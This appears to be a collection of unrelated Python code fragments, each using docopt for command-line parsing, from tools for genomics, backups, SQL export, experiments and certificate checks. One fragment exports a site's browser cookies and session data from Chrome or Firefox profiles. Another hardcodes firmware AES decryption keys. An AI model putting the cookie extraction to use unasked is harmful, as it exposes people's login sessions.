variant.classification = "FN" else: variant.REF = "" variant.ALT = "" variant.fetch_variant_type() variant.classification = "" if args["--vcf-sites"] and variant.classification != "": output_line = True elif args["--all-sites"] is True: output_line = True else: if args["--all-sites"]: output_line = True elif variant.is_variant: output_line = True if output_line: variant.sample = sample if record.description: variant.description = record.description else: variant.description = os.path.split(handle.name)[1] print '\t'.join([str(variant)])
# names to use for json files storing input matrices default_names = ['a.arr', 'b.arr', 'c.arr'] def create_matrix(spec): shape = spec['shape'] a = spec['a'] if 'a' in spec else 1.0 b = spec['b'] if 'b' in spec else 0.0 return (a * np.random.random_sample(shape)) + b if __name__ == '__main__': arguments = docopt(__doc__, version='JSON Matrix Generator') base_directory = os.path.join(arguments['<directory>'], '') test_file = arguments['<spec.json>'] sys.path.insert(0, './' + base_directory) operation = __import__("operation") with open(test_file, 'r') as f: try: tests = json.load(f) except Exception as e: print("Couldn't parse JSON configuration file: {0}".format(e.message)) sys.exit(1)
def main(): """ My main function """ args = docopt(docs, version=__version__) helper(foo = args['--foo'], bar = args['--bar'])
print('Firefox session filename does not exist:%s' % path) return {} if path is None: path = find_cookie_file() session_path = os.path.join(os.path.dirname(path), 'sessionstore.js') domain = urllib.parse.urlparse(url).netloc cookie = load(path, domain) session_cookie = load_session(session_path, domain) cookie.update(session_cookie) return cookie if __name__ == '__main__': from docopt import docopt doc = """ export given url's cookie, format only supports "chrome" and "firefox". if path is "-" then use default cookie. output format is json Usage: cookie_export.py <dst> <src> <format> <url> """ args = docopt(doc, version="cookie_cheat v1.0") src = None if args["<src>"] == "-" else args["<src>"] if args["<format>"] == "chrome": cookie = chrome_cookies(args["<url>"], src) elif args["<format>"] == "firefox": cookie = firefox_cookies(args["<url>"], src) with open(args["<dst>"], "w") as fo: json.dump(cookie, fo)
#!/usr/bin/env python3 # (c) B. Kerler 2017-2020, licensed under MIT license """ Usage: ozipdecrypt.py --help ozipdecrypt.py <filename> Options: Mode 1 for regular ozip, Mode 2 for CPH1803/CPH1909 [default: 1] """ from docopt import docopt args = docopt(__doc__, version='1.2') import os import sys, stat import shutil import binascii from Crypto.Cipher import AES from zipfile import ZipFile keys = [ "D6EECF0AE5ACD4E0E9FE522DE7CE381E", # mnkey "D6ECCF0AE5ACD4E0E92E522DE7C1381E", # mkey "D6DCCF0AD5ACD4E0292E522DB7C1381E", # realkey, R9s CPH1607 MSM8953, Plus, R11, RMX1921 Realme XT, RMX1851EX Realme Android 10, RMX1992EX_11_OTA_1050 "D7DCCE1AD4AFDCE2393E5161CBDC4321", # testkey "D7DBCE2AD4ADDCE1393E5521CBDC4321", # utilkey "D7DBCE1AD4AFDCE1393E5121CBDC4321", # R11s CPH1719 MSM8976, Plus "D4D2CD61D4AFDCE13B5E01221BD14D20", # FindX CPH1871 SDM845 "261CC7131D7C1481294E532DB752381E", # FindX
def main(wf): """Run Script Filter. Args: wf (workflow.Workflow): Workflow object. """ args = docopt(__doc__, wf.args) log.debug('args : {!r}'.format(args)) query = args.get('<query>') bootstrap(wf) # Alternative actions ---------------------------------------------- if args.get('--openapi'): subprocess.call(['open', SIGNUP_URL]) return if args.get('--openhelp'): subprocess.call(['open', README_URL]) return if args.get('--openunits'): path = wf.datafile(CUSTOM_DEFINITIONS_FILENAME) subprocess.call(['open', path]) return if args.get('--openactive'): path = wf.datafile(ACTIVE_CURRENCIES_FILENAME) subprocess.call(['open', path]) return # Parse query ------------------------------------------------------ if DELIMITER in query: return handle_delimited_query(query) # Filter options --------------------------------------------------- query = query.strip() options = [ dict(title='View Help File', subtitle='Open help file in your browser', valid=True, arg='--openhelp', icon=ICON_HELP), dict(title='View All Supported Currencies', subtitle='View and search list of supported currencies', autocomplete=u'currencies {} '.format(DELIMITER), icon=ICON_CURRENCY), dict(title='Edit Active Currencies', subtitle='Edit the list of active currencies', valid=True, arg='--openactive', icon='icon.png'), dict(title='Edit Custom Units', subtitle='Add and edit your own custom units', valid=True, arg='--openunits', icon='icon.png'), dict(title='Get API key', subtitle='Sign up for free openexchangerates.org account', valid=True, arg='--openapi', icon=ICON_WEB), ] if query: options = wf.filter(query, options, key=lambda d: d['title'], min_score=30) if not options: wf.add_item('No matching options', 'Try a different query?', icon=ICON_WARNING) for d in options: wf.add_item(**d) wf.send_feedback() return
""" Usage: cat_jsonl <input> <line>... Options: --verbose """ import json import docopt if __name__ == '__main__': argv = docopt.docopt(__doc__) lines = [int(i) for i in argv['<line>']] with open(argv['<input>']) as fp: for i, line in enumerate(fp): if i in line: obj = json.loads(line) print(json.dumps(obj, indent=2))
elif check_result == 'vollist': grab_booklist(url, output_dir, cover_path) else: print( '请输入正确的网址,例如:\nhttp://lknovel.lightnovel.cn/main/vollist/492.html' '\nhttp://lknovel.lightnovel.cn/main/book/1578.html') def main(): global SINGLE_THREAD if len(sys.argv) > 1: urls = arguments['<url>'] SINGLE_THREAD = arguments['-s'] output_dir = None if not arguments['--output'] else arguments[ '--output'][0] cover_path = None if not arguments['--cover'] else arguments[ '--cover'][0] else: urls = input('Please input urls(separate with space):').split() if is_single_thread(): SINGLE_THREAD = True output_dir = None cover_path = None start(urls, output_dir, cover_path) if __name__ == '__main__': arguments = docopt(__doc__, version='Lknovel 1.0') sys.exit(main())
exec(cmd) else: print eval(cmd) print '' except Exception, e: print e # evalcmd(dir_mo) # break if __name__ == "__main__": # parsehtml(downloadpage(url_s)) # StreamHandler(sys.stdout).push_application() # log = LoggerFactory.getLogger('SinaMarketNew') from docopt import docopt log = LoggerFactory.log args = docopt(cct.sina_doc, version='sina_cxdn') # print args,args['-d'] if args['-d'] == 'debug': log_level = LoggerFactory.DEBUG elif args['-d'] == 'info': log_level = LoggerFactory.INFO else: log_level = LoggerFactory.ERROR # log_level = LoggerFactory.DEBUG if args['-d'] else LoggerFactory.ERROR log.setLevel(log_level) # log.setLevel(LoggerFactory.DEBUG) # handler=StderrHandler(format_string='{record.channel}: {record.message) [{record.extra[cwd]}]') # log.level = log.debug # error_handler = SyslogHandler('Sina-M-Log', level='ERROR')
def main(): """Main function.""" # Get the command line arg args = docopt(__doc__, version="Mackup {}".format(VERSION)) mckp = Mackup() app_db = ApplicationsDatabase() def printAppHeader(app_name): if verbose: print(("\n{0} {1} {0}").format(header("---"), bold(app_name))) # If we want to answer mackup with "no" for each question if args['--force']: utils.FORCE_NO = True dry_run = args["--dry-run"] verbose = args["--verbose"] if args["backup"]: # Check the env where the command is being run mckp.check_for_usable_backup_env() # Backup each application for app_name in sorted(mckp.get_apps_to_backup()): app = ApplicationProfile(mckp, app_db.get_files(app_name), dry_run, verbose) printAppHeader(app_name) app.backup() elif args["restore"]: # Check the env where the command is being run mckp.check_for_usable_restore_env() # Restore the Mackup config before any other config, as we might need # it to know about custom settings mackup_app = ApplicationProfile(mckp, app_db.get_files(MACKUP_APP_NAME), dry_run, verbose) printAppHeader(MACKUP_APP_NAME) mackup_app.restore() # Initialize again the apps db, as the Mackup config might have changed # it mckp = Mackup() app_db = ApplicationsDatabase() # Restore the rest of the app configs, using the restored Mackup config app_names = mckp.get_apps_to_backup() # Mackup has already been done app_names.discard(MACKUP_APP_NAME) for app_name in sorted(app_names): app = ApplicationProfile(mckp, app_db.get_files(app_name), dry_run, verbose) printAppHeader(app_name) app.restore() elif args["uninstall"]: # Check the env where the command is being run mckp.check_for_usable_restore_env() if dry_run or (utils.confirm( "You are going to uninstall Mackup.\n" "Every configuration file, setting and dotfile" " managed by Mackup will be unlinked and moved back" " to their original place, in your home folder.\n" "Are you sure ?")): # Uninstall the apps except Mackup, which we'll uninstall last, to # keep the settings as long as possible app_names = mckp.get_apps_to_backup() app_names.discard(MACKUP_APP_NAME) for app_name in sorted(app_names): app = ApplicationProfile(mckp, app_db.get_files(app_name), dry_run, verbose) printAppHeader(app_name) app.uninstall() # Restore the Mackup config before any other config, as we might # need it to know about custom settings mackup_app = ApplicationProfile(mckp, app_db.get_files(MACKUP_APP_NAME), dry_run, verbose) mackup_app.uninstall() # Delete the Mackup folder in Dropbox # Don't delete this as there might be other Macs that aren't # uninstalled yet # delete(mckp.mackup_folder) print("\n" "All your files have been put back into place. You can now" " safely uninstall Mackup.\n" "\n" "Thanks for using Mackup !") elif args["list"]: # Display the list of supported applications mckp.check_for_usable_environment() output = "Supported applications:\n" for app_name in sorted(app_db.get_app_names()): output += " - {}\n".format(app_name) output += "\n" output += "{} applications supported in Mackup v{}".format( len(app_db.get_app_names()), VERSION) print(output) elif args["show"]: mckp.check_for_usable_environment() app_name = args["<application>"] # Make sure the app exists if app_name not in app_db.get_app_names(): sys.exit("Unsupported application: {}".format(app_name)) print("Name: {}".format(app_db.get_name(app_name))) print("Configuration files:") for file in app_db.get_files(app_name): print(" - {}".format(file)) # Delete the tmp folder mckp.clean_temp_folder()
os.makedirs(dest_dir) root = os.path.abspath(os.path.join(arguments['<data_dir>'], 'pages')) pages = os.listdir(root) # os.chdir(dest_dir) for page in pages: attachment_dir = os.path.join(root, page, 'attachments') if not os.path.exists(attachment_dir): continue print("Copying attachments for %s" % page) path = _unquote(page) dest_path = os.path.join(dest_dir, path) if not os.path.exists(dest_path): os.makedirs(dest_path) for f in os.listdir(attachment_dir): print(".. %s" % f) full_file_name = os.path.join(attachment_dir, f) shutil.copy(full_file_name, dest_path) if __name__ == '__main__': arguments = docopt.docopt(__doc__, version=__version__) if arguments['users']: print(json.dumps(parse_users(), sort_keys=True, indent=2)) elif arguments['migrate']: migrate_to_git() elif arguments['attachments']: copy_attachments()
def main(): """Entry point.""" try: # parse_args() args = docopt(__doc__) except DocoptExit: raise DocoptExit blob_path = "%s/%s" % (args["--path"], args["--blobdir"]) try: views = [ "--view blob --param plotShape=circle --param largeFonts=true --format png", "--view blob --param plotShape=hex --param largeFonts=true --format png", "--view blob --param plotShape=square --param largeFonts=true --format png", "--view blob --param plotShape=kite --param largeFonts=true --format png", "--view cumulative --param largeFonts=true --format png", "--view snail --param largeFonts=true --format png", ] if not args["--coverage"]: views = views[4:] cmds = [] for view in views: cmds.append( "blobtools view --host %s --timeout %s --ports %s %s --out %s/ %s" % ( args["--host"], args["--timeout"], args["--ports"], view, blob_path, args["--blobdir"], )) cmds.append("blobtools filter --summary %s/%s.summary.json %s" % (blob_path, args["--blobdir"], blob_path)) cmds.append("blobtools add --key static_plots=true %s" % blob_path) for cmd in cmds: logger.info(cmd) with subprocess.Popen( shlex.split(cmd), stdout=subprocess.PIPE, preexec_fn=os.setsid, encoding="utf-8", ) as process: try: process.communicate(timeout=1800)[0] except subprocess.TimeoutExpired: os.killpg( process.pid, signal.SIGINT) # send signal to the process group process.communicate()[0] for filename in os.listdir(blob_path): p = Path("%s/%s" % (blob_path, filename)) parts = filename.split(".") if filename.startswith(args["--blobdir"]): if (filename.endswith("png") or filename.endswith("svg") or filename.endswith("json")): if parts[1].isdigit(): parts = parts[2:] else: parts = parts[1:] new_p = Path("%s/%s" % ( p.parent.as_posix(), filename.replace("%s." % args["--blobdir"], ""), )) p.rename(new_p) except Exception as err: logger.error(err) for pngpath in glob.iglob( os.path.join(blob_path, "%s.*.png" % args["--blobdir"])): os.remove(pngpath) for svgpath in glob.iglob( os.path.join(blob_path, "%s.*.svg" % args["--blobdir"])): os.remove(svgpath) for jsonpath in glob.iglob( os.path.join(blob_path, "%s.*.json" % args["--blobdir"])): os.remove(jsonpath) exit(1)
def cli(): supported_formats = 'csv tsv json yaml html xls xlsx dbf latex ods'.split() formats_lst=", ".join(supported_formats) cli_docs ="""Records: SQL for Humans™ A Kenneth Reitz project. Usage: records <query> [<format>] [<params>...] [--url=<url>] records (-h | --help) Options: -h --help Show this screen. --url=<url> The database URL to use. Defaults to $DATABASE_URL. Supported Formats: %(formats_lst)s Note: xls, xlsx, dbf, and ods formats are binary, and should only be used with redirected output e.g. '$ records sql xls > sql.xls'. Query Parameters: Query parameters can be specified in key=value format, and injected into your query in :key format e.g.: $ records 'select * from repos where language ~= :lang' lang=python Notes: - While you may specify a database connection string with --url, records will automatically default to the value of $DATABASE_URL, if available. - Query is intended to be the path of a SQL file, however a query string can be provided instead. Use this feature discernfully; it's dangerous. - Records is intended for report-style exports of database queries, and has not yet been optimized for extremely large data dumps. """ % dict(formats_lst=formats_lst) # Parse the command-line arguments. arguments = docopt(cli_docs) query = arguments['<query>'] params = arguments['<params>'] format = arguments.get('<format>') if format and "=" in format: del arguments['<format>'] arguments['<params>'].append(format) format = None if format and format not in supported_formats: print('%s format not supported.' % format) print('Supported formats are %s.' % formats_lst) exit(62) # Can't send an empty list if params aren't expected. try: params = dict([i.split('=') for i in params]) except ValueError: print('Parameters must be given in key=value format.') exit(64) # Be ready to fail on missing packages try: # Create the Database. db = Database(arguments['--url']) # Execute the query, if it is a found file. if os.path.isfile(query): rows = db.query_file(query, **params) # Execute the query, if it appears to be a query string. elif len(query.split()) > 2: rows = db.query(query, **params) # Otherwise, say the file wasn't found. else: print('The given query could not be found.') exit(66) # Print results in desired format. if format: content = rows.export(format) if isinstance(content, bytes): print_bytes(content) else: print(content) else: print(rows.dataset) except ImportError as impexc: print(impexc.msg) print("Used database or format require a package, which is missing.") print("Try to install missing packages.") exit(60)
def main(): """This is the main function that does the heavy-lifting""" args = docopt.docopt(__doc__, version='0.0.1') # Initialize expyriment & wait its message to show initialize.init_arguments(args) exp = initialize.init_expyriment(args) # Useful shortcuts throughout the file kb = expyriment.io.Keyboard() # If we need to calibrate, then do so and terminate. if args["calibrate"]: calibration(exp, args) expyriment.control.end('Merci !', 2000) return 0 # Hash table for fast retrieval when presenting: reading from disk is slow! hash_table = dict() # Now let's read the csv file line by line and populate the events. # PriorityQueue sort on insertion based on the first element of the # inserted tuple: this means your csv file can have random order, or that # you can take input from several csv files events = queue.PriorityQueue() for csv_file in args["<file>"]: # Save the path to the CSV file exp.add_experiment_info(csv_file) # Create the path to the stimuli bp = args["--stim-dir"] # Open the csv file and read its rows. # ATTENTION : Encoding is platform dependant. See the open() manual for row in csv.reader(open(csv_file), delimiter='\t'): # Destruct a row into its parts, they will be of type str onset, stype, f, *meta = row # If this is the first encounter of this stimuli then preload it if (stype, f) not in hash_table: hash_table[stype, f] = load_stimuli(stype, f, bp, args) hash_table[stype, f].preload() # Then push relevant events based on the type events.put((int(onset), stype, f, (stype, f), meta)) expyriment.control.start(skip_ready_screen=True, subject_id=args["--subject-id"]) good = expyriment.stimuli.Audio(bp + "/correct.wav") bad = expyriment.stimuli.Audio(bp + "/incorrect.wav") good.preload() bad.preload() show_text("Waiting for scanner trigger", args).present() kb.wait_char('t') # Start the experiment clock and loop through the events clock = expyriment.misc.Clock() last_right_pos = -1 has_played = False while not events.empty(): onset, stype, id, (stype, f), *meta = events.get() # If it's still too early, then wait for the onset but log keypresses while clock.time < (onset - 1): k = kb.check() if k is not None: exp.data.add([clock.time, "keypressed", k]) if (not has_played) and (stype == "oddity" or stype == "oddity-faces"): has_played = True if k == 114: if last_right_pos in [0, 1, 5]: good.present() elif last_right_pos in [2, 3, 4]: bad.present() elif k == 108: if last_right_pos in [2, 3, 4]: good.present() elif last_right_pos in [0, 1, 5]: bad.present() # When time has come, present the stimuli and log that you just did so reported_time = hash_table[stype, f].present() if (stype == "oddity" or stype == "oddity-faces"): last_right_pos = int(meta[0][0]) has_played = False exp.data.add( list([clock.time, stype, id, onset, reported_time] + meta[0])) # Now the experiment is done, terminate the exp expyriment.control.end('Merci !', 2000) return 0
Options: -h, --help Show this screen. --version Show version. -f, --file <path-to-file> Path to the CSV file. -s, --start <start-row> Row number where the CSV should start [default: 0]. """ import csv import time import sys from docopt import docopt from pprint import pprint import common arguments = docopt(__doc__, version='Query overpass for WC-Guide entries 1.0') wc_csv = arguments['--file'] toilets = [] count_queries = 0 totalrows = sum(1 for _ in open(wc_csv)) with open(wc_csv, 'r') as f: reader = csv.DictReader(f, delimiter=',') start_row = int(arguments['--start']) for i, row in enumerate(reader): if i < start_row: continue print(f"{i}/{totalrows} toilets. {count_queries} Overpass requests.", file=sys.stderr) """ typ:
delta = decode_date(cert[1]) - datetime.datetime.now() print(u"CN : {0}".format(print_cn(cert))) print(u"Expires after {0}".format(decode_date(cert[1]))) print(u"Expires in {0} days\n".format(delta.days)) elif arguments["--watch"]: try: days = int(arguments["--watch"]) except: print(u"You did not entered a correct number of days. Exiting...") exit(1) if decode_date(cert[1]) > datetime.datetime.now() and decode_date(cert[1]) < datetime.datetime.now() + datetime.timedelta(days): delta = decode_date(cert[1]) - datetime.datetime.now() print(u"CN : {0}".format(print_cn(cert))) print(u"Expires after {0}".format(decode_date(cert[1]))) print(u"Expires in {0} days\n".format(delta.days)) elif decode_date(cert[1]) < datetime.datetime.now() and arguments["--expired"]: # If expired print(u"Certificat expired :") print(u"CN : {0}".format(print_cn(cert))) print(u"Expired since {0}\n".format(decode_date(cert[1]))) elif cert[0] == "R" and arguments["--revoked"]: print(u"Certificat revoked :") print(u"CN : {0}".format(print_cn(cert))) print(u"Revoked {0}\n".format(decode_date(cert[2]))) if __name__ == "__main__": arguments = docopt(help) if arguments["--crl"]: parse_crl() else: parse_index()
if not self.periodic_check_thread.ident: self.periodic_check_thread.start() if not self.event_listener_thread.ident: self.event_listener_thread.start() sleep(5) except KeyboardInterrupt: logging.info('Stopping threads') self.shutting_down.set() self.periodic_check_thread.join() self.event_listener_thread.join() if __name__ == '__main__': args = docopt(__doc__, version='MongoDB Operator 0.1') logging.basicConfig( level=getattr(logging, args['--loglevel'].upper()), format='%(asctime)s %(levelname)s %(threadName)s %(message)s') # Suppress urllib3.connectionpool warnings that seem to come from the # Python kubernetes client logging.getLogger('urllib3.connectionpool').setLevel(logging.ERROR) try: mongodb_operator = MongoDBOperator() except config.config_exception.ConfigException as e: logging.error( 'unable to connect to k8s apiserver using service account') exit(1) except Exception as e:
from docopt import docopt from flask import Flask from flask_mongoengine import MongoEngine from werkzeug.contrib.fixers import ProxyFix from api.venicescholar_api.cache import cache from api.venicescholar_api import api, api_blueprint def create_app(config_file="config/dev.cfg"): """ Returns an instance of the LinkedBooks API as a flask app. """ app = Flask(__name__) app.config.from_pyfile(config_file) cache.init_app(app) db = MongoEngine() db.init_app(app) app.wsgi_app = ProxyFix(app.wsgi_app) app.register_blueprint(api_blueprint) return app app = create_app(config_file="config/dev.cfg") #pdb.set_trace() if __name__ == "__main__": arguments = docopt(__doc__) app = create_app(config_file=arguments["--config"]) app.run()
--version Show version. """ import sys from docopt import docopt from prettytable import PrettyTable from fibratus.apidefs.sys import set_console_ctrl_handler, PHANDLER_ROUTINE from fibratus.common import IO from fibratus.errors import FilamentError from fibratus.kevent import KEvents from fibratus.version import VERSION from fibratus.fibratus_entrypoint import Fibratus from fibratus.filament import Filament args = docopt(__doc__, version=VERSION) kevent_filters = args['<kevents>'] filament_name = args['--filament'] if args['--filament'] else None def _check_kevent(kevent): if not kevent in KEvents.all(): IO.write_console( 'fibratus run: ERROR - %s is not a valid kernel event. Run list-kevents to see' ' the available kernel events' % kevent) sys.exit() if __name__ == '__main__': if args['run']: